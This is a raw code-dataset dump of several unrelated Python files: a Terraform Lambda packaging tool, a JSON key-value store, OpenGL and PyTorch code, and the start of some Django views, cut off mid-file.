list_files(top_path, logger=None):\n \"\"\"\n Returns a sorted list of all files in a directory.\n \"\"\"\n\n if logger:\n logger = logger.getChild('ls')\n\n results = []\n\n for root, dirs, files in os.walk(top_path):\n for file_name in files:\n file_path = os.path.join(root, file_name)\n relative_path = os.path.relpath(file_path, top_path)\n results.append(relative_path)\n if logger:\n logger.debug(relative_path)\n\n results.sort()\n return results\n\n\ndef dataclass(name, **fields):\n typ = type(name, (object,), {\n '__slots__': fields.keys(),\n '__getattr__': lambda *_: None,\n })\n for k, v in fields.items():\n setattr(typ, k, v)\n return typ\n\n\ndef datatree(name, **fields):\n def decode_json(v):\n if v and isinstance(v, str) and v[0] in '\"[{':\n try:\n return json.loads(v)\n except json.JSONDecodeError:\n pass\n return v\n\n return dataclass(name, **dict(((\n k, datatree(k, **v) if isinstance(v, dict) else decode_json(v))\n for k, v in fields.items())))()\n\n\ndef timestamp_now_ns():\n timestamp = datetime.datetime.now().timestamp()\n timestamp = int(timestamp * 10 ** 7) * 10 ** 2\n return timestamp\n\n\ndef source_code_hash(bytes):\n return b64encode(hashlib.sha256(bytes).digest()).decode()\n\n\ndef yesno_bool(val):\n if val is None:\n return\n if isinstance(val, bool):\n return val\n if isinstance(val, int):\n return bool(val)\n if isinstance(val, str):\n if val.isnumeric():\n return bool(int(val))\n val = val.lower()\n if val in ('true', 'yes', 'y'):\n return True\n elif val in ('false', 'no', 'n'):\n return 
False\n else:\n raise ValueError(\"Unsupported value: %s\" % val)\n return False\n\n\n################################################################################\n# Packaging functions\n\ndef emit_dir_files(base_dir):\n for root, dirs, files in os.walk(base_dir):\n if root != '.':\n yield os.path.normpath(root)\n for name in files:\n path = os.path.normpath(os.path.join(root, name))\n if os.path.isfile(path):\n yield path\n\n\ndef make_zipfile(zip_filename, *base_dirs, timestamp=None,\n compression=zipfile.ZIP_DEFLATED):\n \"\"\"\n Create a zip file from all the files under 'base_dir'.\n The output zip file will be named 'base_name' + \".zip\". Returns the\n name of the output zip file.\n \"\"\"\n\n # Borrowed from python 3.8 zipfile.py library\n # due to the need of strict_timestamps functionality.\n def from_file(cls, filename, arcname=None, *, strict_timestamps=True):\n \"\"\"Construct an appropriate ZipInfo for a file on the filesystem.\n\n filename should be the path to a file or directory on the filesystem.\n\n arcname is the name which it will have within the archive (by default,\n this will be the same as filename, but without a drive letter and with\n leading path separators removed).\n \"\"\"\n if isinstance(filename, os.PathLike):\n filename = os.fspath(filename)\n st = os.stat(filename)\n isdir = stat.S_ISDIR(st.st_mode)\n mtime = time.localtime(st.st_mtime)\n date_time = mtime[0:6]\n if not strict_timestamps and date_time[0] < 1980:\n date_time = (1980, 1, 1, 0, 0, 0)\n elif not strict_timestamps and date_time[0] > 2107:\n date_time = (2107, 12, 31, 23, 59, 59)\n # Create ZipInfo instance to store file information\n if arcname is None:\n arcname = filename\n arcname = os.path.normpath(os.path.splitdrive(arcname)[1])\n while arcname[0] in (os.sep, os.altsep):\n arcname = arcname[1:]\n if isdir:\n arcname += '/'\n zinfo = cls(arcname, date_time)\n zinfo.external_attr = (st.st_mode & 0xFFFF) << 16 # Unix attributes\n if isdir:\n zinfo.file_size = 0\n zinfo.external_attr |= 0x10 # MS-DOS directory flag\n else:\n zinfo.file_size = st.st_size\n\n return zinfo\n\n # An extended version of a write method\n # from the original zipfile.py library module\n def write(self, filename, arcname=None,\n compress_type=None, compresslevel=None,\n date_time=None):\n \"\"\"Put the bytes from filename into the archive under the name\n arcname.\"\"\"\n if not self.fp:\n raise ValueError(\n \"Attempt to write to ZIP archive that was already closed\")\n if self._writing:\n raise ValueError(\n \"Can't write to ZIP archive while an open writing handle exists\"\n )\n\n if PY38:\n zinfo = zipfile.ZipInfo.from_file(\n filename, arcname, strict_timestamps=self._strict_timestamps)\n else:\n zinfo = from_file(\n zipfile.ZipInfo, filename, arcname, strict_timestamps=True)\n\n if date_time:\n zinfo.date_time = date_time\n\n if zinfo.is_dir():\n zinfo.compress_size = 0\n zinfo.CRC = 0\n else:\n if compress_type is not None:\n zinfo.compress_type = compress_type\n else:\n zinfo.compress_type = self.compression\n\n if compresslevel is not None:\n zinfo._compresslevel = compresslevel\n else:\n zinfo._compresslevel = self.compresslevel\n\n if zinfo.is_dir():\n with self._lock:\n if self._seekable:\n self.fp.seek(self.start_dir)\n zinfo.header_offset = self.fp.tell() # Start of header bytes\n if zinfo.compress_type == zipfile.ZIP_LZMA:\n # Compressed data includes an end-of-stream (EOS) marker\n zinfo.flag_bits |= 0x02\n\n self._writecheck(zinfo)\n self._didModify = True\n\n self.filelist.append(zinfo)\n 
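# the entry is appended to the member list and then indexed by arcname below, so a later member written under the same arcname shadows this one in name lookups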
self.NameToInfo[zinfo.filename] = zinfo\n self.fp.write(zinfo.FileHeader(False))\n self.start_dir = self.fp.tell()\n else:\n with open(filename, \"rb\") as src, self.open(zinfo, 'w') as dest:\n shutil.copyfileobj(src, dest, 1024 * 8)\n\n def str_int_to_timestamp(s):\n min_zip_ts = datetime.datetime(1980, 1, 1).timestamp()\n ts = int(s)\n if ts < min_zip_ts:\n return min_zip_ts\n deg = len(str(int(s))) - 9\n if deg < 0:\n ts = ts * 10 ** deg\n return ts\n\n logger = logging.getLogger('zip')\n\n date_time = None\n if timestamp is not None:\n if isinstance(timestamp, str):\n if timestamp.isnumeric():\n timestamp = str_int_to_timestamp(timestamp)\n else:\n timestamp = float(timestamp)\n elif isinstance(timestamp, int):\n timestamp = str_int_to_timestamp(str(timestamp))\n\n date_time = datetime.datetime.fromtimestamp(timestamp).timetuple()[:6]\n if date_time[0] < 1980:\n raise ValueError('ZIP does not support timestamps before 1980')\n\n archive_dir = os.path.dirname(zip_filename)\n\n if archive_dir and not os.path.exists(archive_dir):\n logger.info(\"creating %s\", archive_dir)\n os.makedirs(archive_dir)\n\n logger.info(\"creating '%s' archive\", zip_filename)\n\n tmp_zip_filename = '{}.tmp'.format(zip_filename)\n try:\n with zipfile.ZipFile(tmp_zip_filename, \"w\", compression) as zf:\n for base_dir in base_dirs:\n logger.info(\"adding content of directory '%s'\", base_dir)\n with cd(base_dir, silent=True):\n for path in emit_dir_files('.'):\n logger.info(\"adding '%s'\", path)\n write(zf, path, path, date_time=date_time)\n except Exception:\n os.unlink(tmp_zip_filename)\n else:\n os.replace(tmp_zip_filename, zip_filename)\n return zip_filename\n\n\n################################################################################\n# Docker building\n\ndef docker_build_command(build_root, docker_file=None, tag=None):\n \"\"\"\"\"\"\n docker_cmd = ['docker', 'build']\n if docker_file:\n docker_cmd.extend(['--file', docker_file])\n if tag:\n docker_cmd.extend(['--tag', tag])\n docker_cmd.append(build_root)\n\n cmd_logger.info(shlex_join(docker_cmd))\n log_handler and log_handler.flush()\n return docker_cmd\n\n\ndef docker_run_command(build_root, command, runtime,\n image=None, shell=None, interactive=False,\n pip_cache_dir=None):\n \"\"\"\"\"\"\n docker_cmd = ['docker', 'run', '--rm']\n\n if interactive:\n docker_cmd.append('-it')\n\n bind_path = os.path.abspath(build_root)\n docker_cmd.extend(['-v', \"{}:/var/task:z\".format(bind_path)])\n\n home = os.environ['HOME']\n docker_cmd.extend([\n # '-v', '{}/.ssh/id_rsa:/root/.ssh/id_rsa:z'.format(home),\n '-v', '{}/.ssh/known_hosts:/root/.ssh/known_hosts:z'.format(home),\n ])\n\n if platform.system() == 'Darwin':\n # https://docs.docker.com/docker-for-mac/osxfs/#ssh-agent-forwarding\n docker_cmd.extend([\n '--mount', 'type=bind,'\n 'src=/run/host-services/ssh-auth.sock,'\n 'target=/run/host-services/ssh-auth.sock',\n '-e', 'SSH_AUTH_SOCK=/run/host-services/ssh-auth.sock',\n ])\n elif platform.system() == 'Linux':\n sock = os.environ['SSH_AUTH_SOCK'] # TODO: Handle missing env var\n docker_cmd.extend([\n '-v', '{}:/tmp/ssh_sock:z'.format(sock),\n '-e', 'SSH_AUTH_SOCK=/tmp/ssh_sock',\n ])\n if pip_cache_dir:\n pip_cache_dir = os.path.abspath(pip_cache_dir)\n docker_cmd.extend([\n '-v', '{}:/root/.cache/pip:z'.format(pip_cache_dir),\n ])\n else:\n raise RuntimeError(\"Unsupported platform for docker building\")\n\n if not image:\n image = 'lambci/lambda:build-{}'.format(runtime)\n\n docker_cmd.append(image)\n\n assert isinstance(command, list)\n if 
shell:\n if not isinstance(shell, str):\n shell = '/bin/sh'\n docker_cmd.extend([shell, '-c'])\n docker_cmd.extend(command)\n\n cmd_logger.info(shlex_join(docker_cmd))\n log_handler and log_handler.flush()\n return docker_cmd\n\n\n################################################################################\n# Commands\n\ndef prepare_command(args):\n \"\"\"\n Generates a content hash of the source_path, which is used to determine if\n the Lambda code has changed, ignoring file modification and access times.\n\n Outputs a filename and a command to run if the archive needs to be built.\n \"\"\"\n\n logger = logging.getLogger('prepare')\n\n def generate_content_hash(source_paths,\n hash_func=hashlib.sha256, logger=None):\n \"\"\"\n Generate a content hash of the source paths.\n \"\"\"\n\n if logger:\n logger = logger.getChild('hash')\n\n hash_obj = hash_func()\n\n for source_path in source_paths:\n if os.path.isdir(source_path):\n source_dir = source_path\n for source_file in list_files(source_dir):\n update_hash(hash_obj, source_dir, source_file)\n if logger:\n logger.debug(os.path.join(source_dir, source_file))\n else:\n source_dir = os.path.dirname(source_path)\n source_file = os.path.relpath(source_path, source_dir)\n update_hash(hash_obj, source_dir, source_file)\n if logger:\n logger.debug(source_path)\n\n return hash_obj\n\n def update_hash(hash_obj, file_root, file_path):\n \"\"\"\n Update a hashlib object with the relative path and contents of a file.\n \"\"\"\n\n relative_path = os.path.join(file_root, file_path)\n hash_obj.update(relative_path.encode())\n\n with open(relative_path, 'rb') as open_file:\n while True:\n data = open_file.read(1024 * 8)\n if not data:\n break\n hash_obj.update(data)\n\n # Load the query.\n query_data = json.load(sys.stdin)\n\n if logger.isEnabledFor(DEBUG3):\n logger.debug('ENV: %s', json.dumps(dict(os.environ), indent=2))\n if logger.isEnabledFor(DEBUG2):\n logger.debug('QUERY: %s', json.dumps(query_data, indent=2))\n\n query = datatree('prepare_query', **query_data)\n\n tf_paths = query.paths\n runtime = query.runtime\n function_name = query.function_name\n artifacts_dir = query.artifacts_dir\n hash_extra_paths = query.hash_extra_paths\n source_path = query.source_path\n hash_extra = query.hash_extra\n recreate_missing_package = yesno_bool(args.recreate_missing_package)\n\n # Compacting docker vars\n docker = query.docker\n if docker:\n docker = {k: v for k, v in docker.items() if v} or True\n\n # Validate the query.\n if not os.path.exists(source_path):\n abort('source_path must be set.')\n\n # Expand a Terraform path. references\n hash_extra_paths = [p.format(path=tf_paths) for p in hash_extra_paths]\n content_hash_paths = [source_path] + hash_extra_paths\n\n # Generate a hash based on file names and content. 
Also use the\n # runtime value, build command, and content of the build paths\n # because they can have an effect on the resulting archive.\n logger.debug(\"Computing content hash on files...\")\n content_hash = generate_content_hash(content_hash_paths, logger=logger)\n content_hash.update(runtime.encode())\n content_hash.update(hash_extra.encode())\n content_hash = content_hash.hexdigest()\n\n # Generate a unique filename based on the hash.\n filename = os.path.join(artifacts_dir, '{}.zip'.format(content_hash))\n\n # Compute timestamp trigger\n was_missing = False\n filename_path = os.path.join(os.getcwd(), filename)\n if recreate_missing_package:\n if os.path.exists(filename_path):\n st = os.stat(filename_path)\n timestamp = st.st_mtime_ns\n else:\n timestamp = timestamp_now_ns()\n was_missing = True\n else:\n timestamp = \"\"\n\n # Replace variables in the build command with calculated values.\n build_data = {\n 'filename': filename,\n 'runtime': runtime,\n 'source_path': source_path,\n 'artifacts_dir': artifacts_dir,\n }\n if docker:\n build_data['docker'] = docker\n\n build_plan = json.dumps(build_data)\n build_plan_filename = os.path.join(artifacts_dir,\n '{}.plan.json'.format(content_hash))\n if not os.path.exists(artifacts_dir):\n os.makedirs(artifacts_dir)\n with open(build_plan_filename, 'w') as f:\n f.write(build_plan)\n\n # Output the result to Terraform.\n json.dump({\n 'filename': filename,\n 'build_plan': build_plan,\n 'build_plan_filename': build_plan_filename,\n 'timestamp': str(timestamp),\n 'was_missing': 'true' if was_missing else 'false',\n }, sys.stdout, indent=2)\n sys.stdout.write('\\n')\n\n\ndef build_command(args):\n \"\"\"\n Builds a zip file from the source_dir or source_file.\n Installs dependencies with pip automatically.\n \"\"\"\n\n logger = logging.getLogger('build')\n\n def create_zip_file(source_dir, target_file, timestamp):\n \"\"\"\n Creates a zip file from a directory.\n \"\"\"\n\n target_dir = os.path.dirname(target_file)\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n make_zipfile(target_file, source_dir, timestamp=timestamp)\n\n if logger.isEnabledFor(DEBUG3):\n logger.debug('ENV: %s', json.dumps(dict(os.environ), indent=2))\n if logger.isEnabledFor(DEBUG2):\n logger.debug('CMD: python3 %s', shlex_join(sys.argv))\n\n with open(args.build_plan_file) as f:\n query_data = json.load(f)\n query = datatree('build_query', **query_data)\n\n runtime = query.runtime\n filename = query.filename\n source_path = query.source_path\n\n timestamp = args.zip_file_timestamp\n artifacts_dir = query.artifacts_dir\n docker = query.docker\n\n if timestamp.isnumeric():\n timestamp = int(timestamp)\n else:\n timestamp = 0\n\n if os.path.exists(filename) and not args.force:\n logger.info('Reused: %s', shlex.quote(filename))\n return\n\n working_dir = os.getcwd()\n\n # Create a temporary directory for building the archive,\n # so no changes will be made to the source directory.\n with tempdir() as temp_dir:\n # Find all source files.\n if os.path.isdir(source_path):\n source_dir = source_path\n source_files = list_files(source_path, logger=logger)\n else:\n source_dir = os.path.dirname(source_path)\n source_files = [os.path.basename(source_path)]\n\n # Copy them into the temporary directory.\n with cd(source_dir):\n for file_name in source_files:\n target_path = os.path.join(temp_dir, file_name)\n target_dir = os.path.dirname(target_path)\n if not os.path.exists(target_dir):\n cmd_logger.info('mkdir -p %s', shlex.quote(target_dir))\n 
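# the shell-style trace above is log-only; the directory is actually created here before the file contents, mode, and stat times are copied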
os.makedirs(target_dir)\n cmd_logger.info('cp -t %s %s',\n shlex.quote(target_dir),\n shlex.quote(file_name))\n shutil.copyfile(file_name, target_path)\n shutil.copymode(file_name, target_path)\n shutil.copystat(file_name, target_path)\n\n # Install dependencies into the temporary directory.\n if runtime.startswith('python'):\n requirements = os.path.join(temp_dir, 'requirements.txt')\n if os.path.exists(requirements):\n with cd(temp_dir):\n if runtime.startswith('python3'):\n pip_command = ['pip3']\n else:\n pip_command = ['pip2']\n pip_command.extend([\n 'install', '--no-compile',\n '--prefix=', '--target=.',\n '--requirement=requirements.txt',\n ])\n if docker:\n pip_cache_dir = docker.docker_pip_cache\n if pip_cache_dir:\n if isinstance(pip_cache_dir, str):\n pip_cache_dir = os.path.abspath(\n os.path.join(working_dir, pip_cache_dir))\n else:\n pip_cache_dir = os.path.abspath(os.path.join(\n working_dir, artifacts_dir, 'cache/pip'))\n\n chown_mask = '{}:{}'.format(os.getuid(), os.getgid())\n shell_command = [shlex_join(pip_command), '&&',\n shlex_join(['chown', '-R',\n chown_mask, '.'])]\n shell_command = [' '.join(shell_command)]\n check_call(docker_run_command(\n '.', shell_command, runtime, shell=True,\n pip_cache_dir=pip_cache_dir\n ))\n else:\n cmd_logger.info(shlex_join(pip_command))\n log_handler and log_handler.flush()\n check_call(pip_command)\n\n # Zip up the temporary directory and write it to the target filename.\n # This will be used by the Lambda function as the source code package.\n create_zip_file(temp_dir, filename, timestamp=0)\n os.utime(filename, ns=(timestamp, timestamp))\n logger.info('Created: %s', shlex.quote(filename))\n if logger.isEnabledFor(logging.DEBUG):\n with open(filename, 'rb') as f:\n logger.info('Base64sha256: %s', source_code_hash(f.read()))\n\n\ndef add_hidden_commands(sub_parsers):\n sp = sub_parsers\n\n def hidden_parser(name, **kwargs):\n p = sp.add_parser(name, **kwargs)\n sp._choices_actions.pop() # XXX: help=argparse.SUPPRESS - doesn't work\n return p\n\n p = hidden_parser('docker', help='Run docker build')\n p.set_defaults(command=lambda args: subprocess.call(docker_run_command(\n args.build_root, args.docker_command, args.runtime, interactive=True)))\n p.add_argument('build_root', help='A docker build root folder')\n p.add_argument('docker_command', help='A docker container command',\n metavar='command', nargs=argparse.REMAINDER)\n p.add_argument('-r', '--runtime', help='A docker image runtime',\n default='python3.8')\n\n p = hidden_parser('docker-image', help='Run docker build')\n p.set_defaults(command=lambda args: subprocess.call(docker_build_command(\n args.build_root, args.docker_file, args.tag)))\n p.add_argument('-t', '--tag', help='A docker image tag')\n p.add_argument('build_root', help='A docker build root folder')\n p.add_argument('docker_file', help='A docker file path',\n nargs=argparse.OPTIONAL)\n\n def zip_cmd(args):\n if args.verbose:\n logger.setLevel(logging.DEBUG)\n make_zipfile(args.zipfile, *args.dir, timestamp=args.timestamp)\n if logger.isEnabledFor(logging.DEBUG):\n zipinfo = shutil.which('zipinfo')\n if zipinfo:\n logger.debug('-' * 80)\n subprocess.call([zipinfo, args.zipfile])\n logger.debug('-' * 80)\n logger.debug('Source code hash: %s',\n source_code_hash(open(args.zipfile, 'rb').read()))\n\n p = hidden_parser('zip', help='Zip folder with provided files timestamp')\n p.set_defaults(command=zip_cmd)\n p.add_argument('zipfile', help='Path to a zip file')\n p.add_argument('dir', nargs=argparse.ONE_OR_MORE,\n 
help='Path to a directory for packaging')\n p.add_argument('-t', '--timestamp', type=int,\n help='A timestamp to override for all zip members')\n p.add_argument('-v', '--verbose', action='store_true')\n\n\ndef args_parser():\n ap = argparse.ArgumentParser()\n ap.set_defaults(command=lambda _: ap.print_usage())\n sp = ap.add_subparsers(metavar=\"COMMAND\")\n\n p = sp.add_parser('prepare',\n help='compute a filename hash for a zip archive')\n p.set_defaults(command=prepare_command)\n\n p = sp.add_parser('build',\n help='build and pack to a zip archive')\n p.set_defaults(command=build_command)\n p.add_argument('--force', action='store_true',\n help='Force rebuilding even if a zip artifact exists')\n p.add_argument('-t', '--timestamp',\n dest='zip_file_timestamp', required=True,\n help='A zip file timestamp generated by the prepare command')\n p.add_argument('build_plan_file', metavar='PLAN_FILE',\n help='A build plan file provided by the prepare command')\n add_hidden_commands(sp)\n return ap\n\n\ndef main():\n ns = argparse.Namespace(\n recreate_missing_package=os.environ.get(\n 'TF_RECREATE_MISSING_LAMBDA_PACKAGE', True),\n log_level=os.environ.get('TF_LAMBDA_PACKAGE_LOG_LEVEL', 'INFO'),\n )\n p = args_parser()\n args = p.parse_args(namespace=ns)\n\n if args.command is prepare_command:\n configure_logging(use_tf_stderr=True)\n else:\n configure_logging()\n\n if args.log_level:\n ll = logging._nameToLevel.get(args.log_level)\n if ll and logging._checkLevel(ll):\n logging.root.setLevel(args.log_level)\n\n exit(args.command(args))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":26905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"645980893","text":"\n\nfrom xai.brain.wordbase.nouns._anklet import _ANKLET\n\n#calss header\nclass _ANKLETS(_ANKLET, ):\n\tdef __init__(self,): \n\t\t_ANKLET.__init__(self)\n\t\tself.name = \"ANKLETS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"anklet\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_anklets.py","file_name":"_anklets.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"258730843","text":"import threading\nimport json\n\nlock = threading._RLock()\n\n\nclass Store():\n \"\"\"\n Store is a key-value service\n \"\"\"\n def __init__(self):\n self.state = {}\n self.filename = \"store.txt\"\n\n # Initialize an empty file even if that file already exists\n with open(self.filename, \"w\"):\n pass\n\n def response(self, status, msg=None):\n \"\"\"\n Build a response. 
Messages will be JSON encoded in Server send_msg.\n\n :param status:\n :param msg:\n :return:\n \"\"\"\n data = {}\n data[\"status\"] = \"success\" if status else \"error\"\n\n if msg:\n data[\"value\"] = msg\n\n return data\n\n def get(self, key):\n \"\"\"\n Returns a value for a key\n\n :param key:\n :return:\n \"\"\"\n try:\n data = self.state[key]\n except KeyError:\n return self.response(False, \"No such key\")\n\n return self.response(True, data)\n\n def set(self, key, value):\n \"\"\"\n Set JSON decoded value for key.\n Also writes the state to disk in JSON format\n\n :param key:\n :param value:\n :return:\n \"\"\"\n try:\n data = json.loads(value)\n except ValueError:\n return self.response(False, \"Value is not a valid JSON\")\n\n with lock:\n self.state[key] = data\n try:\n with open(self.filename, \"w\") as f:\n json.dump(self.state, f)\n except (OSError, IOError) as e:\n return self.response(False, \"Couldn't save state: {}\".format(e))\n\n return self.response(True)\n\n def save(self):\n \"\"\"\n Save state to a file\n\n :return:\n \"\"\"\n with lock:\n with open(self.filename, \"w\") as f:\n json.dump(self.state, f)\n\n def load(self):\n \"\"\"\n Load state from a file\n\n :return:\n \"\"\"\n with lock:\n with open(self.filename, \"r\") as f:\n self.state = json.load(f)\n","sub_path":"store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"56725861","text":"from pointwindow import PointWindow\nimport numpy as np\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL.ARB.vertex_buffer_object import *\nfrom blockplayer import config\nfrom blockplayer import blockdraw\n\n\n# Window for drawing point cloudsc\nclass BlockWindow(PointWindow):\n\n def __init__(self, *args, **kwargs):\n self.modelmat = np.eye(4)\n self.flag_drawgrid = False\n super(BlockWindow,self).__init__(*args, **kwargs)\n\n def draw_board(self):\n LW,LH = config.LW, config.LH\n glPolygonOffset(1.0,0.2)\n glEnable(GL_POLYGON_OFFSET_FILL)\n\n # Draw the gray table\n if 'bg' in config.__dict__:\n glBegin(GL_QUADS)\n glColor(0.2,0.2,0.2,1)\n for x,y,z in config.bg['boundptsM']:\n glVertex(x,y,z)\n glEnd()\n\n glPushMatrix()\n glMultMatrixf(np.linalg.inv(self.modelmat).transpose())\n glScale(LW,LH,LW)\n\n glEnable(GL_BLEND)\n glBlendFunc(GL_SRC_ALPHA,GL_ONE_MINUS_SRC_ALPHA)\n glPushMatrix()\n glTranslate(*config.bounds[0])\n blockdraw.draw()\n glPopMatrix()\n\n # Draw the shadow blocks (occlusions)\n glDisable(GL_POLYGON_OFFSET_FILL)\n\n # Draw the axes for the model coordinate space\n glLineWidth(3)\n glBegin(GL_LINES)\n glColor3f(1,0,0); glVertex3f(0,0,0); glVertex3f(1,0,0)\n glColor3f(0,1,0); glVertex3f(0,0,0); glVertex3f(0,1,0)\n glColor3f(0,0,1); glVertex3f(0,0,0); glVertex3f(0,0,1)\n glEnd()\n\n # Draw a grid for the model coordinate space\n if self.flag_drawgrid:\n glLineWidth(1)\n glBegin(GL_LINES)\n GR = config.GRIDRAD/2\n glColor3f(1.0,1.0,1.0)\n for j in range(0,1):\n for i in range(-GR,GR+1):\n glVertex(i,j,-GR); glVertex(i,j,GR)\n glVertex(-GR,j,i); glVertex(GR,j,i)\n glEnd()\n glPopMatrix()\n pass\n glLineWidth(1)\n\n def on_draw(self):\n super(BlockWindow,self).set_camera()\n\n glClearColor(*self.clearcolor)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glEnable(GL_DEPTH_TEST)\n\n self._wrap('pre_draw')\n\n if not self.modelmat is None:\n self.draw_points()\n self.draw_board()\n\n 
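        # NOTE (added, hedged): _wrap() presumably invokes an optional hook by
        # name if one was defined on the window; 'post_draw' below would fire
        # after the point cloud and board geometry have been rendered.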
self._wrap('post_draw')\n","sub_path":"blockplayer/visuals/blockwindow.py","file_name":"blockwindow.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"351350358","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom torch import optim\n\nfrom NeuralNetwork.Loader import CustomLoader\nfrom NeuralNetwork.Model import *\n\n# uncomment if you don't use pycharm\n# from Loader import CustomLoader\n# from Model import *\n\nDEVICE = (\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef load_checkpoint(filepath):\n model = torch.load(filepath)\n # model.load_state_dict(cp['state_dict'])\n for parameter in model.parameters():\n parameter.requires_grad = False\n\n model.eval()\n\n return model\n\n\ndef run(ta_data, tr_data, epochs=100, save_path='arousal.pth', inputs=56):\n train_data_, test_data_, train_label_, test_label_ = train_test_split(tr_data, ta_data, test_size=0.3)\n train_set = CustomLoader(train_data_, test_data_, train_label_, test_label_, 'tr')\n test_set = CustomLoader(train_data_, test_data_, train_label_, test_label_, 'v')\n # if os.path.exists('./net/arousal.pth'):\n # model = load_checkpoint('./net/arousal.pth')\n # print('Load saved Model')\n # else:\n model = Net(inputs=inputs).to(DEVICE)\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(model.parameters(), lr=0.5)\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=int(epochs * 0.25), gamma=0.6)\n # optimizer = optim.Adam(model.parameters(), lr=1, weight_decay=0.5)\n train(model, optimizer, criterion, train_set, test_set, epochs, batch_size=8, scheduler=scheduler,\n save_path=save_path)\n\n\nif __name__ == '__main__':\n ta_data = pd.read_csv('../Validation/arousal.csv', header=None)\n tr_data = pd.read_csv('../Converted/Deap/6.Deap_Data_Mean/afd.csv', header=None)\n run(ta_data, tr_data)\n","sub_path":"NeuralNetwork/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"6580648","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport utils\nimport numpy as np\n\nclass ConvNet(nn.Module):\n\n def __init__(self):\n super(ConvNet, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(\n in_channels=3,\n out_channels=64,\n kernel_size=5,\n stride=1,\n padding=2,\n ),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2),\n )\n self.conv2 = nn.Sequential(\n nn.Conv2d(64, 128, 5, 1, 2),\n nn.ReLU(), \n nn.MaxPool2d(2), \n )\n self.conv3 = nn.Sequential(\n nn.Conv2d(256, 512, 5, 1, 2),\n nn.ReLU(),\n nn.MaxPool2d(2),\n )\n self.conv4 = nn.Sequential(\n nn.Conv2d(512, 1024, 5, 1, 2),\n nn.ReLU(),\n nn.MaxPool2d(2),\n )\n self.fc1 = nn.Sequential(\n nn.Flatten(),\n nn.Linear(4096, 512),\n nn.ReLU(),\n )\n self.fc2 = nn.Sequential(\n nn.Linear(512, 50),\n nn.Tanh(),\n )\n self.fc3 = nn.Sequential(\n nn.Linear(50, 10),\n )\n self.out = nn.Softmax()\n self.g_fi = None\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.fc3(self.fc2(self.fc1(x)))\n self.g_fi = x\n return self.out(x)\n\nclass FCNet(nn.Module):\n\n def __init__(self):\n super(FCNet, self).__init__()\n self.fc1 = nn.Sequential(\n nn.Linear(512, 50),\n nn.ReLU()\n )\n self.fc2 = nn.Sequential(\n nn.Linear(50, 10),\n nn.Tanh()\n )\n self.out = nn.Softmax(dim=1)\n self.wfi = None\n\n def forward(self, 
x):\n x = self.fc1(x)\n x = self.fc2(x)\n self.wfi = x\n #print(x.shape)\n return self.out(x)\n\nclass Lossb(nn.Module):\n\n def __init__(self, n, alpha):\n super(Lossb, self).__init__()\n w = 1.0 / n\n self.n = n\n self.alpha = alpha\n self.wn = Variable(w * torch.ones((n - 1, 1)), requires_grad=True)\n self.W = torch.cat((self.wn, torch.ones((1,1)) - torch.sum(self.wn)))\n self.diff = torch.Tensor(self.W)\n\n def forward(self, x_out, I):\n loss = 0.0\n for i in range(utils.context_size):\n gx = torch.transpose(x_out, 1, 0)\n gx = gx[torch.arange(gx.size(0))!=i]\n wt = torch.transpose(self.W, 1, 0)\n ij = I[:, i]\n ten1 = torch.matmul(gx, (self.W * ij)) / torch.matmul(wt, ij)\n ten2 = torch.matmul(gx, (self.W * (1 - ij))) / torch.matmul(wt, 1 - ij)\n loss += torch.norm(ten1 - ten2) ** 2\n loss += self.alpha * (torch.norm(self.W) ** 2)\n return loss\n\n def update(self):\n new_w = torch.cat((self.wn, torch.ones((1,1)) - torch.sum(self.wn)))\n self.diff = new_w - self.W\n self.W = new_w\n diff = torch.norm(self.diff, p=1)\n return diff\n\nclass Lossp(nn.Module):\n\n def __init__(self, lam):\n super(Lossp, self).__init__()\n self.lam = lam\n\n def forward(self, gout, fout, y, W):\n lossq = -utils.lam * (torch.norm(gout)**2)\n loss = torch.sum(W * torch.log(torch.sum((fout * y), dim=1))) + lossq\n return loss\n\n","sub_path":"baseline/niid.py","file_name":"niid.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"622064355","text":"from django.shortcuts import render,redirect\nfrom .form import *\nfrom django.contrib.auth import authenticate,login,logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom homepage.decorators import allowed_users\nfrom teacher.models import *\nfrom .models import Stud\nfrom homepage.friend_request import FriendRequest\nfrom teacher.form import Assignment_ans_Form\n\n\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef student_profile(request):\n\treturn render(request, 'student_profile.html')\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef student_req(request):\n\trequests = FriendRequest.objects.filter(from_user=request.user.stud)\n\treturn render(request, 'student_req.html',{'requests':requests})\n\t\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef teachers(request):\n\tteachers=Tutor.objects.exclude(friends=request.user.stud)\n\treturn render(request, 